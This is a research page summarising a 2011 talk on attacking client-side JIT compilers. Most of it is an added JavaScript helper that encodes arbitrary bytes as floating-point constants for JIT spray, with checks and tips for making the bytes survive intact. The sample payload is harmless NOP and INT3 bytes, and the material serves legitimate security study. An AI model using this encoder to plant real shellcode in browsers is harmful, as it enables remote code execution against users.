Attacking Client Side JIT Compilers

JIT engines are everywhere. The browser you are reading this page with contains at least one JIT. Because these complex components generate native code at runtime and write it into memory that must then be executable, they greatly affect the security of the applications that embed them.


Our research focused on a number of different areas:


  • An overview of the LLVM and Firefox JIT engines
  • Unintended code emission bugs
  • Inline caches and the weak (RWX) memory permissions they demand
  • Reusable JIT emitted code sequences at predictable locations (ROP gaJITs)
  • JIT spray attacks on other JIT engines through floating point values
  • Blind execution through overwriting JIT page contents
  • JIT Page inline meta data attacks
  • JIT Protection techniques and the JITs that utilize them
  • Our jitter tool chain and grammar fuzzers for finding JIT bugs
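
The floating-point JIT spray item above rests on one mechanic: a chosen byte sequence is cut into 8-byte chunks, each chunk is reinterpreted as an IEEE-754 double, and the doubles are placed in source as constants so that a JIT which emits them as raw 64-bit immediates leaves the bytes in executable memory. The following JavaScript is an added example written for this page, not code from the paper or its authors; the function names are ours, the sample bytes are constructed, and which source construct makes a particular engine embed a constant in emitted code is engine-specific and not shown. It covers the encoding, the exact round trip, and the two cases a practitioner has to watch for: chunks that decode to NaN or Infinity (payload may be canonicalized by the engine) and the -0 value (its decimal form drops the sign bit).

```javascript
// Added example, not code from the original paper: the encoding step of
// a floating-point JIT spray. Byte order follows the host (little-endian
// on x86), which is also how an x86 JIT lays out a 64-bit immediate.
// Function names are assumptions made for this illustration.

const NOP = 0x90; // x86 single-byte NOP used to pad the final chunk

// Pack bytes into doubles, 8 bytes per double, padding the tail with NOPs.
function bytesToDoubles(bytes) {
  const doubles = [];
  for (let i = 0; i < bytes.length; i += 8) {
    const buf = new ArrayBuffer(8);
    const view = new Uint8Array(buf);
    for (let j = 0; j < 8; j++) {
      view[j] = i + j < bytes.length ? bytes[i + j] : NOP;
    }
    doubles.push(new Float64Array(buf)[0]);
  }
  return doubles;
}

// Inverse of bytesToDoubles: recover the raw bit pattern of each double.
function doublesToBytes(doubles) {
  const bytes = [];
  for (const d of doubles) {
    const buf = new ArrayBuffer(8);
    new Float64Array(buf)[0] = d;
    bytes.push(...new Uint8Array(buf));
  }
  return bytes;
}

// Chunks whose exponent field is all ones decode to NaN or Infinity.
// Engines may canonicalize NaN payloads as the value moves through
// registers, boxing or arithmetic, so such chunks cannot be relied on to
// carry arbitrary bytes. Returns the indices of the affected chunks.
function unreliableChunks(doubles) {
  const bad = [];
  doubles.forEach((d, i) => {
    if (!Number.isFinite(d)) bad.push(i);
  });
  return bad;
}

// Source-text form of a constant for embedding in a function body.
// String(d) is the shortest decimal that parses back to exactly d, except
// that -0 prints as "0"; the sign bit (the top bit of the chunk) must be
// restored by emitting the literal -0 instead.
function toSourceLiteral(d) {
  if (!Number.isFinite(d)) {
    throw new Error('NaN/Infinity chunk is not a reliable carrier');
  }
  return Object.is(d, -0) ? '-0' : String(d);
}

// True when every input byte survives the double encoding unchanged.
function roundTripsExactly(bytes) {
  const out = doublesToBytes(bytesToDoubles(bytes));
  return bytes.every((b, i) => out[i] === b);
}

// Constructed sample: eight NOPs followed by three INT3 (0xCC) bytes.
const SAMPLE = [0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xcc, 0xcc, 0xcc];
```

Calling `bytesToDoubles(SAMPLE)` yields two doubles, the second padded with five NOPs; `unreliableChunks` on the result is empty, whereas a chunk of eight 0xFF bytes is flagged because it decodes to NaN. Before a sequence is used, run `roundTripsExactly` on it and `unreliableChunks` on its doubles: a flagged chunk means the sequence must be re-arranged (for example by inserting NOPs) until no chunk has an all-ones exponent field.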

You can download our slides and research paper below:

Download the Slides

Download the Presentations

Published date:  05 August 2011
